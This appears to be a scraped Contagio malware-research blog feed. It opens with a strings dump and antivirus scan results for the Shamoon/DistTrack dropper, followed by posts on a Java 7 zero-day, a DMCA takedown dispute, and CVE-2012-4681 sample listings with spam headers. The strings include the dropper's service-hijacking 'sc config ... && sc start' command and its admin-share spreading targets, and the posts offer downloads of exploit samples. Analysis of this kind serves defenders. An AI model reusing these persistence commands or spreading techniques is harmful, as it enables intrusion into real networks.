`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt re
turning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
new
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
NetScheduleJobDel
NetApiBufferFree
NetApiBufferAllocate
NetRemoteTOD
NETAPI32.dll
WS2_32.dll
GetTickCount
CloseHandle
Process32NextW
Process32FirstW
CreateToolhelp32Snapshot
OpenProcess
GetCurrentProcess
VirtualFree
VirtualAlloc
LocalFree
Sleep
LocalAlloc
GetLastError
MoveFileExW
DeleteFileW
GetProcAddress
GetModuleHandleW
WriteFile
CreateFileW
SizeofResource
LockResource
LoadResource
FindResourceW
GetCommandLineW
GetFileTime
GetWindowsDirectoryW
SetFileTime
CreateThread
CreateProcessW
CopyFileW
MoveFileW
ReadFile
GetSystemTime
LeaveCriticalSection
EnterCriticalSection
DeleteCriticalSection
WaitForSingleObject
InitializeCriticalSection
KERNEL32.dll
LoadImageW
USER32.dll
StartServiceW
RegCloseKey
RegDeleteValueW
RegOpenKeyExW
Chan
geServiceConfig2W
CreateServiceW
CloseServiceHandle
ChangeServiceConfigW
QueryServiceConfigW
OpenServiceW
OpenSCManagerW
RegQueryValueExW
StartServiceCtrlDispatcherW
SetServiceStatus
RegisterServiceCtrlHandlerW
ADVAPI32.dll
CommandLineToArgvW
SHELL32.dll
InterlockedIncrement
InterlockedDecrement
EncodePointer
DecodePointer
RaiseException
RtlUnwind
HeapFree
ExitProcess
HeapSetInformation
WideCharToMultiByte
LCMapStringW
MultiByteToWideChar
GetCPInfo
HeapAlloc
IsProcessorFeaturePresent
TerminateProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
SetLastError
GetCurrentThreadId
HeapCreate
SetHandleCount
GetStdHandle
InitializeCriticalSectionAndSpinCount
GetFileType
GetStartupInfoW
GetConsoleCP
GetConsoleMode
FlushFileBuffers
SetFilePointer
LoadLibraryW
GetLocaleInfoW
GetModuleFileNameW
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
GetACP
GetOEMCP
IsValidCodePage
GetStringTypeW
HeapReAlloc
HeapSize
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
WriteConsoleW
SetStdHandle
CreateFileA
SetEndOfFile
GetProcessHeap
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVruntime_error@std@@
.?AVfacet@locale@std@@
.?AVcodecvt_base@std@@
.?AUctype_base@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV?$ctype@D@std@@
.?AVsystem_error@std@@
.?AVfailure@ios_base@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$codecvt@DDH@std@@
.?AVbad_cast@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_fstream@DU?$char_traits@D@std@@@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AV_Locimp@locale@std@@
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
.?AVbad_exception@std@@

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
KG=]
>]H:
uD^5
_D`j
^+'o
^#WkW+K
_aFNZ-
kS3~
K^#s
K^aCN
^#WkW+K
_aFNZ-

Unicode Strings:
---------------------------------------------------------------------------
jjjjj
@LanmanWorkstation
WOW64
SYSTEM\CurrentControlSet\Services\TrkSvr
Distributed Link Tracking Server
Enables the Distributed Link Tracking Client service within the same domain to provide more reliable and efficient maintenance of links within the domain. If this service is disabled, any services that explicitly depend on it will fail to start.
RpcSs
C:\Windows\system32\svchost.exe -k netsvcs
TrkSvr
.exe
kernel32.dll
amd64
AMD64
PROCESSOR_ARCHITECTURE
SYSTEM\CurrentControlSet\Control\Session Manager\Environment
ntrksvr.exe
trksrv.exe
netinit
\system32\kernel32.dll
netapi32.dll
%SystemRoot%\System32\
\system32\
\system32\csrss.exe
E$\WINDOWS
D$\WINDOWS
C$\WINDOWS
ADMIN$
\inf\netft429.pnf
PKCS7
\System32\cmd.exe /c "ping -n 30 127.0.0.1 >nul && sc config TrkSvr binpath= system32\trksrv.exe && ping -n 10 127.0.0.1 >nul && sc start TrkSvr "
X509
myimage12767
PKCS12
wow32
mscoree.dll
 ((((( H
 h(((( H
 H
AKERNEL32.DLL
runtime error
TLOSS error
SING error
DOMAIN error
R6033
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.

R6002
- floating point support not loaded
AMicrosoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
Eccs
UTF-8
UTF-16LE
UNICODE
WUSER32.DLL
CONOUT$
caclsrv
certutl
clean
ctrl
dfrag
dnslookup
dvdquery
event
findfile
gpget
ipsecure
iissrv
msinit
ntfrsutil
ntdsutl
power
rdsadmin
regsys
sigver
routeman
rrasrv
sacses
sfmsc
smbinit
wcscript
ntnw
netx
fsutl
extract
\system32\
test123
test456
test789
testdomain.com
123123
456456
789789
PKCS12
PKCS7
X509
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
Microsoft Corporation
FileDescription
Distributed Link Tracking Server
FileVersion
5.2.3790.0 (srv03_rtm.030324-2048)
InternalName
Distributed Link Tracking Server
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
trksvr
ProductName
Microsoft
Windows
Operating System
ProductVersion
5.2.3790.0
VarFileInfo
Translation

Automatic scans

https://www.virustotal.com/file/f9d94c5de86aa170384f1e2e71d95ec373536899cb7985633d3ecfdb67af0f72/analysis/
SHA256:     f9d94c5de86aa170384f1e2e71d95ec373536899cb7985633d3ecfdb67af0f72
SHA1:     502920a97e01c2d022ac401601a311818f336542
MD5:     d214c717a357fe3a455610b197c390aa
File size:     966.0 KB ( 989184 bytes )
File name:     str.exe
File type:     Win32 EXE
Tags:     peexe
Detection ratio:     22 / 42
Analysis date:     2012-08-16 13:57:43 UTC ( 16 hours, 25 minutes ago )

AntiVir     TR/Crypt.FKM.Gen     20120816
Avast     Win32:Malware-gen     20120816
AVG     unknown virus Win32/DH{A2cI}     20120815
BitDefender     Gen:Trojan.Heur.8u0@ILmUdSm     20120816
Commtouch     W32/Dropper.gen8!Maximus     20120816
Comodo     UnclassifiedMalware     20120816
Emsisoft     Trojan.Win32.Spy!IK     20120816
F-Prot     W32/Dropper.gen8!Maximus     20120815
F-Secure     Gen:Trojan.Heur.8u0@ILmUdSm     20120816
GData     Gen:Trojan.Heur.8u0@ILmUdSm     20120816
Ikarus     Trojan.Win32.Spy     20120816
Jiangmin     Trojan/Generic.aninx     20120816
K7AntiVirus     Trojan     20120815
Kaspersky     HEUR:Trojan.Win32.Generic     20120816
McAfee     W32/DistTrack     20120816
McAfee-GW-Edition     W32/DistTrack     20120816
Norman     W32/Troj_Generic.DKYIW     20120816
Sophos     Troj/Mdrop-ELD     20120816
Symantec     W32.DistTrack     20120816
TrendMicro     TROJ_DISTTRACK.A     20120816
TrendMicro-HouseCall     TROJ_DISTTRACK.A     20120816
VIPRE     Trojan.Win32.Generic!BT     20120816

https://www.virustotal.com/file/4f02a9fcd2deb3936ede8ff009bd08662bdb1f365c0f4a78b3757a98c2f40400/analysis/
SHA256:    4f02a9fcd2deb3936ede8ff009bd08662bdb1f365c0f4a78b3757a98c2f40400
SHA1:    7c0dc6a8f4d2d762a07a523f19b7acd2258f7ecc
MD5:    b14299fd4d1cbfb4cc7486d978398214
File size:    966.0 KB ( 989184 bytes )
File name:    str.exe
File type:    Win32 EXE
Tags:    peexe
Detection ratio:    21 / 42
Analysis date:    2012-08-16 13:39:56 UTC ( 16 hours, 44 minutes ago )
AntiVir    TR/Crypt.FKM.Gen    20120816
Avast    Win32:Malware-gen    20120816
AVG    unknown virus Win32/DH{A2cI}    20120815
BitDefender    Gen:Trojan.Heur.8u0@ILmUdSm    20120816
Commtouch    W32/Dropper.gen8!Maximus    20120816
Comodo    UnclassifiedMalware    20120816
Emsisoft    Trojan.Win32.Spy!IK    20120816
F-Prot    W32/Dropper.gen8!Maximus    20120815
F-Secure    Gen:Trojan.Heur.8u0@ILmUdSm    20120816
GData    Gen:Trojan.Heur.8u0@ILmUdSm    20120816
Ikarus    Trojan.Win32.Spy    20120816
K7AntiVirus    Trojan    20120815
Kaspersky    HEUR:Trojan.Win32.Generic    20120816
McAfee    W32/DistTrack    20120816
McAfee-GW-Edition    W32/DistTrack    20120816
Norman    W32/Troj_Generic.DLKSV    20120816
Sophos    Troj/Mdrop-ELD    20120816
SUPERAntiSpyware    -    20120816
Symantec    W32.DistTrack    20120816
TrendMicro    TROJ_DISTTRACK.A    20120816
TrendMicro-HouseCall    TROJ_DISTTRACK.A    20120816
VIPRE    Trojan.Win32.Generic!BT    20120816

VirusBuster    -

↧

DeepEnd Research: Java 7 0-Day vulnerability information and mitigation.

August 27, 2012, 12:07 am

≫ Next: Java 7 0-day vulnerability analysis

≪ Previous: Shamoon or DistTrack.A samples

img.kids.discovery.com

The cat is out of the bag. There is 0-day out there currently being used in targeted attacks. The number of these attacks has been relatively low, but it is likely to increase due to the fact that this is a fast and reliable exploit that can be used in drive-by attacks and all kinds of links in emails. Interestingly, Mark Wuergler mentioned on August 10 that VulnDisco SA CANVAS exploit pack now has a new Java 0-day. It makes you wonder if it is the same exploit that leaked from or was found in the wild and added to the CANVAS pack. Or if it is totally unrelated and there are two 0-day exploits now.

The purpose of this post is not to provide the vulnerability analysis or samples but to offer additional information that may help prevent infections on some targeted networks. We all know what kind of damage Java vulnerabilities can cause if used in drive by exploits or exploit packs and we think that revealing technical vulnerability details in the form of a detailed technical analysis is dangerous, while releasing working exploits before the patch is vain and irresponsible.

Oracle patch cycle is 4 months (middle of February, June, October) with bugfixes 2 months after the patch. The next patch day is October 16 - almost two months away. Oracle almost never issue out-of-cycle patches but hopefully they will do consider it serious enough to do it time.

Read more at DeepEndResearch.org

↧

Java 7 0-day vulnerability analysis

August 27, 2012, 12:13 pm

≫ Next: Contagio file downloads are not available indefinitely (thanks to Mediafire and LeakID ideas about copyright)

≪ Previous: DeepEnd Research: Java 7 0-Day vulnerability information and mitigation.

Here is our second article about Java 7 0-day vulnerability. Read more at DeepEndResearch.org

ladyilonwick.wordpress.com

Considering that Rapid 7 posted a working exploit and addition to the exploit packs is imminent (Attackers Pounce on Zero-Day Java Exploit by Brian Krebs), plus other analysis articles are being published such as New Java 0day exploited in the wild -by Alienvault, we decided that witholding details of the exploit will not offer additional protection but only hinder development of protection and signatures.

As we mentioned earlier, we contacted Michael Schierl, the Java expert who discovered a number of Java vulnerabilities and asked him to have a look. He sent back his detailed analysis, exploit source, the interim patch with the source code of the patched class.

Patch request:

Interim patch with the source code of the patched class. See the Readme of the patch in the previous post (thanks to Michael Schierl).

Email from your company email address to admin <at> deependresearch.org and explain the planned use, please.

↧

Contagio file downloads are not available indefinitely (thanks to Mediafire and LeakID ideas about copyright)

September 6, 2012, 11:51 am

≫ Next: CVE-2012-4681 samples Original (APT) and Blackhole 2.0 (crime)

≪ Previous: Java 7 0-day vulnerability analysis

Update5:
Mediafire notified me the other day that they had confirmation from LeakID that the notices they submitted were done in error. They restored all the file access.
I want to thank all who helped me with the posts and updates Paul Robert from SophosLabs , Soulskill- Slashdot, Dan Kaplan from SC Magazine for their articles, everyone who made posts on Twitter and the Mediafire team for the über fast response to the posts and resolution. I guess LeakID do not speak to victims directly, never heard from them.

Update4:

robocoparchive.com

This is last Update 4, after which we will return to normal operations. Yesterday afternoon the Director of MediaFire Customer Support reached out and we exchanged a couple of long emails. In short, he pointed out they have to comply with the DMCA notices and apologized for the interruption. I pointed out that LeakID did not comply with the DMCA filing rules, in particular, they did not "identify the copyrighted work claimed to have been infringed" and falsely stated "that the information in the notification is accurate, and under penalty of perjury, that the complaining party is authorized to act on behalf of the owner of an exclusive right that is allegedly infringed." In result, they (LeakID) do not deserve any respect and Mediafire relationship with LeakID undermines customer trust in Mediafire and cloud services in general.

I must note that the account was un-suspended pending the the "infringement investigation" results. My counterclaim will be answered or expire on September 16, after which I hope all charges will be cleared. This reactivation happened only thanks to the magazine and blogpost articles. Normally, the three strikes result in account ~~closing~~ suspension pending the results. (Sept. 8, 2012 - I just received a reply to my email from the MediaFire President and CEO Derek Labian assuring me that they investigate all the suspended accounts and it would be resolved regardless of any posts as they take these claims seriously, but not as fast as I would like. He also stated that if mistakes were made, they were made by LeakID and not Mediafire.)

I understand that that the claims came from LeakID and I do understand that all claims must be checked and it takes time to check them. However, I do not appreciate auto-enforcement of American laws by foreign (and American) robots who do not even follow the filing laws. I think accounts should be suspended after the claims are proven to be true not before.

Here are links to a related court case and an EFF article about Warner Brothers, who used LeakID services to crawl Hotfile links and file baseless copyright infringement notices en masse.

New hosting:
We had very kind offers from many people, including those who we know well and highly trust. We are thankful and might accept an offer later. At this point, it looks like there is not a lot of data in the public facing storage of Contagio (we are talking a few GB at this point), and we can host it on a DeepEnd Research server.

New Data / new posts
All new posts will have download links to a new storage. Exchange and Mobile Exchange public upload boxes will upload data to Mediafire, after which it will be copied to the new storage as it comes.

Old data / old posts
The old data will be mirrored to a new location and will be relinked in each post very gradually or very fast, depending on the copyright robots craziness and resulting DMCA notices. I will provide a link to the entire collection on the new storage for Contagio/Contagio Mobile/ Contagio Exchange so you can save to your own storage and not to worry about future issues. You can do it now too - all blogs have "Download it all" links on the right side.

Mediafire
Mediafire will host Upload boxes and all incoming new data will be mirrored to a new storage. Old links will point to Mediafire for the time being - until we change them.

Update 3
August 7, 2012
I am delighted that Mediafire unblocked my account. I believe it is still in danger of being blocked due to the copyright violation pending claims ( see the screenshot below) but at least I can get access to my 34+ GB of data and pull it out in one piece. I am glad Mediafire responded - not directly to me but at least by unblocking it. I hope LeakID meet a more serious problem than Contagio on their path and get sued.

I want to thank Paul Robert from SophosLabs , Soulskill- Slashdot, Dan Kaplan from SC Magazine for their articles, everyone who made posts on Twitter (https://twitter.com/#!/search/snowfl0w) and sent emails with invitations for hosting, offers of legal help, and advice. I hoped this would get resolved peacefully and and it did for now, and quicker than I hoped. Thank you all again.

I will be gradually relinking files to a new storage. Mediafire service has been fast and convenient but I do not want to deal with the copyright robocops that can cause a shutdown at any moment.
I hope the account stay active during the time of transition.

Mila

Update 2

Once again, thank you all for your offers of help, advice, RTs and mentions of Twitter. It really helps and I appreciate it.

I tried to call LeakID but got their answering service. I also talked a with Mediafire support person, who kindly explained to me that:

1. They do not discuss legal / account suspension matters over the phone but only via email and ticketing. I need to wait for their answers via email. Waiting..
2. My account was suspended for 3 consecutive copyright violations.

I was surprised but I figured out what they were:
1. August 9, 2012
"The file named Office2010-kb2289161-fullfile-x64-glb.exe is identified by the key (pgfawjnsdt8zt88)."
This is a free Microsoft Office patch for Office 2010 downloadable from here http://www.microsoft.com/en-us/download/details.aspx?id=22189. I had it in my mediafire account folder and posted here. When I got this notice in August, I thought it was paranoid and silly, considering that these patches are free for all Windows users and copied to every WSUS system freely but I did not research the copyright details on the patches so I did not feel like spending time and just removed the file. It was a mistake as they counted it as strike 1.
Update Sept 7: As requested, the full notice sent regarding the MS office patch is pasted here, together with the Youtube videos that were embedded in it. It is 31 pages long. http://contagiodump.blogspot.com/2011/09/mediafire-dmca-office2010-kb2289161.html

2. September 6, 2012
"CVE-2009-0927_CVE-2009-4324_CVE-2007-5659_350924123CBF1B126F4E38335ED6660D_conference_prog.zip is identified by the key (0cbxoda8dpbjnh8)"
As I said, it happens to be an encrypted zip with a malicious PDF attachment described here http://contagiodump.blogspot.com/2010/08/aug-3-cve-2009-0927-cve-2009-4324-cve.html
I did file the counterclaim this morning but it was strike 2.

3. September 6, 2012
While I was arguing with the tech support on email about file 2, the third "violation" was found and account was suspended.
"CVE-2009-4324 PDF 2010-04-20 5f49a04d3738b6026852207419bc0789c article on US Taiwan policy.zip", which is an encrypted zip with a malicious PDF posted here http://contagiodump.blogspot.com/2010/04/cve-2009-4324-pdf-ustaiwanpolicypdf.html

I tried to explain below that it is not a copyrighted file but is an example of an exploit.

Interestingly, their emails come with embedded youtube videos - some ads of sorts. I don't know what kind of copyright infringement claim comes with ads, I guess the victims of their bullying click on the videos hoping for explanation of the craziness and LeakID or Mediafire get paid for it?

Also, my file was listed in the message in a very long list of other files that belonged to other users - see part of it on the screenshot, which is utterly unprofessional for an official copyright claim.

In a way, it reminds me of malware scareware that locks your computer for "copyright infringement" -described here http://www.fbi.gov/news/stories/2012/august/new-internet-scam, except they are real and my account suspension is real too.

LeakID cannot see file contents because of the password and their decision was made based on the filenames / mask searches. Not sure what kind of alert my file names triggered - maybe some keys or some movie names, but the lack of discretion and investigation is astounding. If Contagio were a company, I would be wondering if these are my competitors filing such complaints to take me out of business, as it seems to be a perfect way to DoS any service these days.

Update: Thank you all for the offers of support (really appreciate it) and additional information - see links below from bloggers who had their own works removed or were/are in a similar situation with LeakID and various hosting services.

==================================================================

Contagio file downloads are not available indefinitely (thanks to Mediafire and LeakID ideas about copyright)

This morning I got pop ups on my Mediafire Pro (paid) account about copyright violations on my account, in particular CVE-2009-0927_CVE-2009_5659_350924123CBF1B126F4E38335ED6660D_conference_prog.zip, which happens to be an old malicious PDF attachment described here http://contagiodump.blogspot.com/2010/08/aug-3-cve-2009-0927-cve-2009-4324-cve.html
The picture of the pop up is below. The file is encrypted with an uncommon password, making it impossible to accidentally unzip and infect anyone, thus does not violate any anti-malware rules. In any case, the argument was about copyright, not malware.

Mediafire support suggested filing a counterclaim with a French copyright watchdog company called LeakID, after which they promised to unblock the file if LeakID do not respond.

I sent an email to LeakID and to Mediafire support. After a number of emails back and forth and many protests on my part, I gave up and filed the counterclaim. I was against filing it first because there is no any investigation, checks, or presumptions of innocence. I can see nothing but trolling based on some grep mask they use to search through file sharing services and cause the suspension.

Mediafire responded a few times and then completely blocked my account as a way to show they have the upper hand in this situation and are in control on my files regardless of what I think. The customer service representative "LaChandra" was very polite but that does not change the fact that this is an unacceptable attitude to customers who do not violate anything but are being wrongfully accused by some third party organizations.

Apparently, anyone can contact any file sharing service and claim DMCA violations and make them suspend any file you don't like? All it takes is to claim you are a file owner or representative of the owner (LeakID are making illegal false claims in this case, as they are not and cannot be owners of it ) and the file will be suspended.

I am not alone, there are other people who are affected by this http://www.tumblr.com/tagged/leakid?before=1338438407.

If / when I get access to the files again, I will be moving them to another service, except I am not sure what kind of service, except my own hosting I can trust now. For me it is a black mark on all cloud services and a reason why I would be hesitant to recommend using cloud services for companies who are concerned about ownership of their files.

Dear MediaFire User:
MediaFire has received notification under the provisions of the Digital Millennium Copyright Act ("DMCA") that your usage of a file is allegedly infringing on the file creator's copyright protection. The file named CVE-2009-0927_CVE-2009-4324_CVE-2007-5659_350924123CBF1B126F4E38335ED6660D_conference_prog.zip is identified by the key (0cbxoda8dpbjnh8). As a result of this notice, pursuant to Section 512(c)(1)(C) of the DMCA, we have suspended access to the file.

The reason for suspension was:

BDM user "lachandra" says: Hello, My Name is Hervé Lemaire , CEO of LeakID, I am legal representative of lemaire which does business under the name Metropolitan, Authorized to act on behalf of the owner of an exclusive right that is allegedly infringed. You are hereby given notice valid under the DMCA copyright infringement notification requirements, 17 U.S.C.512. I am the designated agent of the owner of the copyrights of the images and audio/visual works listed below. I believe that the images and audio/visual works listed at the times cited below are being copied and distributed in a manner that has been not authorized by the owner of the copyrights, its agent or the law. All link below containing pirated versions of lemaire copyrighted works. The information in the notice is accurate, under penalty of perjury. Please remove all linksAs soon as possible, we will check them everyday. Thanks to inform us about y our actions. We appreciate your efforts toward this common goal. Very truly yours, Hervé Lemaire Leakid 15 bis rue de chateaudun 92250 La garenne colombes France 0033698211000 Contact lemaire Expendables -
===================

Mediafire pro reply

Hello Mila,

Thank you for contacting MediaFire. Unfortunately we are bound by Federal law that if we receive a complete DMCA notice we have to prevent the file from being shared. The best thing to to do is follow the counterclaim process that was explained in the notice stating that the file was claimed for copyright. If you file a counterclaim the reporting party has 10 days to respond. If they do not we can restore the file.

I am sorry that you are going through this but you will encounter this with any reputable site as we have to follow the law. Follow the instructions in the email to begin the counterclaim process.

Best Regards,

LaChandra

MediaFire | Customer Support

Hello Mila,

This is what someone reporting a file must provide.
1. Identify yourself as either:
1. The owner of a copyrighted work(s), or
2. A person "authorized to act on behalf of the owner of an exclusive right that is allegedly infringed."
2. Identify the copyrighted work claimed to have been infringed
3. Identify the material that is claimed to be infringing or to be the subject of the infringing activity and that is to be removed or access to which is to be disabled, as well as information reasonably sufficient to permit MediaFire to locate the material in the form of a MediaFire.com URL/URLs.
4. Provide contact information that is reasonably sufficient to permit us to contact you, such as an address, telephone number, and a valid electronic mail address.
5. State that you have a good faith belief that use of the material in the manner complained of is not authorized by the copyright owner, its agents, or the law.
6. State that the information in the notification is accurate, and under penalty of perjury, that the complaining party is authorized to act on behalf of the owner of an exclusive right that is allegedly infringed.

If they do all that then we have to prevent the file from being shared. For more details on the information required for valid notification, see 17 U.S.C. 512(c)(3).

Other bloggers abused by LeakID:

Links about LeakID. This article http://korben.info/leakid-la-solution-anti-direct-download.html explains how they are making money by searching and claiming to be the owner / representing owners of every item that their crazy engine tags. I wonder if they have malware authors among customers or they just grab everything and let their paying customers sort it out.

If this isn't unlawful, I know what is.

http://twitter.com/leakid

http://www.leakid.com/

http://fr.viadeo.com/fr/profile/herve.lemaire

http://fr.linkedin.com/in/hervelemaire

http://leakid.blogspot.fr/ ( not updated since 2011, too busy bullying others)

http://fr.wikipedia.org/wiki/Herv%C3%A9_Lemaire

http://whois.domaintools.com/leakid.net

Thanks to http://lesoleilestrare.blogspot.com/ for the links

↧

CVE-2012-4681 samples Original (APT) and Blackhole 2.0 (crime)

September 18, 2012, 11:10 pm

≫ Next: CVE-2012-4969 Internet explorer 0day samples

≪ Previous: Contagio file downloads are not available indefinitely (thanks to Mediafire and LeakID ideas about copyright)

Here are two samples of Java CVE-2012-4681 exploit - one from the original targeted attack described in our post on August 30, 2012 and the other from today's spam redirecting to Blackhole 2.0 exploit kit and using CVE-2012-4681 adapted from the Metasploit framework.
The Blackhole 2.0 ad is translated and posted at malware.dontneedcoffee.com along with a very good analysis.
The spam campaigns are probably different but the one I encountered was using the subject "ADP Invoice Reminder" with ADP_Online_Invoice_DoNotReply@adp.com address sent from what it looks like a spam botnet. The body of the email looks very convincing - see the legitimate ADP email below in comparison to the fake one. The links are legitimate compromised websites redirecting to the Blackhole exploit server. The payload is Zeus (Gameover P2P version not Citadel). Many websites already cleaned and giving error 404 and some are still active. I posted approximately 50 headers below for those who deal with spam filters as well as pcap and other information.

CVE #

CVE-2012-4681

Multiple vulnerabilities in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 6 and earlier allow remote attackers to execute arbitrary code via a crafted applet that bypasses SecurityManager restrictions by (1) using com.sun.beans.finder.ClassFinder.findClass and leveraging an exception with the forName method to access restricted classes from arbitrary packages such as sun.awt.SunToolkit, then (2) using "reflection with a trusted immediate caller" to leverage the getField method to access and modify private fields, as exploited in the wild in August 2012 using Gondzz.class and Gondvv.class.

Download

ORIGINAL 0-DAY - Read more here at DeepEndResearch.org
Download all the files (exploit and payload) (contact me if you need the password)

BLACKHOLE 2

Download all the files and the pcap (contact me if you need the password)

eca85beb81a61c7955da16182c4e1e45diJPN.exe
84dc1ef3e507886e65f694cfff1ace9findex(1).html
86946ec2d2031f2b456e804cac4ade6djava.jar
1d7d43de789f9d90e1ad6e23bab5c61ajs(1).js
d06b095ee74ecc16cd461c9f964486desystems-links_warns.php
3f3ccdfa88fdfa5af3daeb9425ccec89systems-links_warns.php%3fljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07
ae8d9905e99b228714f814b090810d3esystems-links_warns.php%3ftf=0206360203&le=35353306040934370b06&i=02&jy=b&fg=h
253c703c40c857d18e3859d0dc6c37c2systems-links_warns.php%3fyqabyh=0206360203&pldrsl=41&oacozf=35353306040934370b06&etrhphy=0b0006000200030b07
577bc6b390440098715f9f474696778fviewtopic.php
d41d8cd98f00b204e9800998ecf8427eycys.exe
0849cfe65b98ba5fcd9a9ec61a671d09abcd.bat
f938cba971be5cabff12ed865c8c8708tmp1acdeaca.bat
a788c9a1de40788f0c0da8ad2dcf159ctmp9d9790f4.bat
0f976014ddfb658e611091ed3fc75567tmpd80f1a37.bat

BLACKHOLE 2.0 SPAM Original message

As you see the fake message looks rather convincing to those who got real ADP emails before.

The url looks like a real website, because it is (not a fake random character one) -

e.g http://groupe-cmb[.]com/zc0XNMxZ/index.html and sender is like you see below or ADP_Online_Invoice_DoNotReply@adp.com

Headers Examples

Received: from [130.153.37.146] (account DoNotReply@adp.com HELO cjvmeqduvrv.siimgn.biz)
Date:
From:
X-Mailer: The Bat! (v2.01) Business
X-Priority: 3 (Normal)
Message-ID: <8607864097 data-blogger-escaped-.340xsu99453622=".340xsu99453622" data-blogger-escaped-stbjqwkd.xgixswewdtjw.ru="stbjqwkd.xgixswewdtjw.ru">
================================================================================================================================
Received: from 189-77-78-203.ded.intelignet.com.br ([189.77.78.203]) by xxxxxxxxxxxxxxxx
Received: from (192.168.1.34) by ADP.com (189.77.78.203) with Microsoft SMTP Server id 8.0.685.24; Tue, 18 Sep 2012 15:49:31 -0300
Message-ID: <5058b182 data-blogger-escaped-.306070=".306070" data-blogger-escaped-com="com">
Date: Tue, 18 Sep 2012 15:49:31 -0300
From: "ADP_FSA_Services@ADP.com"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101027 Thunderbird/3.1.6
================================================================================================================================
Received: from [186.134.142.75] ([186.134.142.75]) by xxxxxxxxxxxxxxxxxxx
Received: from [61.189.27.40] (helo=cktov.wrhwrmyvudhwz.org)
Date:
From:
X-Mailer: The Bat! (v2.00.5) Personal
X-Priority: 3 (Normal)
Message-ID: <6094750341 data-blogger-escaped-.eqd3fup6310901=".eqd3fup6310901" data-blogger-escaped-iteibhmz.faqnicxhm.va="iteibhmz.faqnicxhm.va">
================================================================================================================================
Received: from livebox ([90.165.21.114]) by naxxxxxxxxxxxxxxxx
Received: from [202.170.182.137] (account ADP_FSA_Services@ADP.com HELO aafwzgc.grqyjsihiufik.ua)
From: "ADP_FSA_Services@ADP.com"
Subject: ADP Invoice Reminder
Date: Tue, 18 Sep 2012 20:34:19 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Priority: 3
X-Mailer: enqutxo 58
Message-ID: <5903434183 data-blogger-escaped-.ih550rq7216042=".ih550rq7216042" data-blogger-escaped-ecfgoauiews.unjttrgmx.su="ecfgoauiews.unjttrgmx.su">
================================================================================================================================
Received: from schoon.cherokee.24wireless-alta.ncn.net ([207.32.51.71]) xxxxxxxxxxxxxxxxxxx
Received: from [164.105.14.124] (account ADPClientServices@adp.com HELO oorim.eadcth.tv)
From: "ADP_FSA_Services@ADP.com"
Subject: ADP Invoice Reminder
Date: Tue, 18 Sep 2012 12:40:33 -0600
Message-ID: <3117788381 data-blogger-escaped-.rkihw101282=".rkihw101282" data-blogger-escaped-wewili.ytanfqfehqxr.org="wewili.ytanfqfehqxr.org">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: hrvqejekrr 87
Content-Language: en
================================================================================================================================
Received: from 189-77-78-203.ded.intelignet.com.br ([189.77.78.203]) by xxxxxxxxxxxxxx
Received: from (192.168.1.34) by ADP.com (189.77.78.203) with Microsoft SMTP Server id 8.0.685.24; Tue, 18 Sep 2012 15:49:31 -0300
Message-ID: <5058b182 data-blogger-escaped-.306070=".306070" data-blogger-escaped-com="com">
Date: Tue, 18 Sep 2012 15:49:31 -0300
From: "ADP_FSA_Services@ADP.com"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101027 Thunderbird/3.1.6
MIME-Version: 1.0
Subject: ADP Invoice Reminder
Content-Type: multipart/alternative;
boundary="------------06010700809080805040108"
================================================================================================================================
Received: from [123.236.57.154] ([123.236.57.154]) by xxxxxxxxxxxxxxxxxxxxxxx
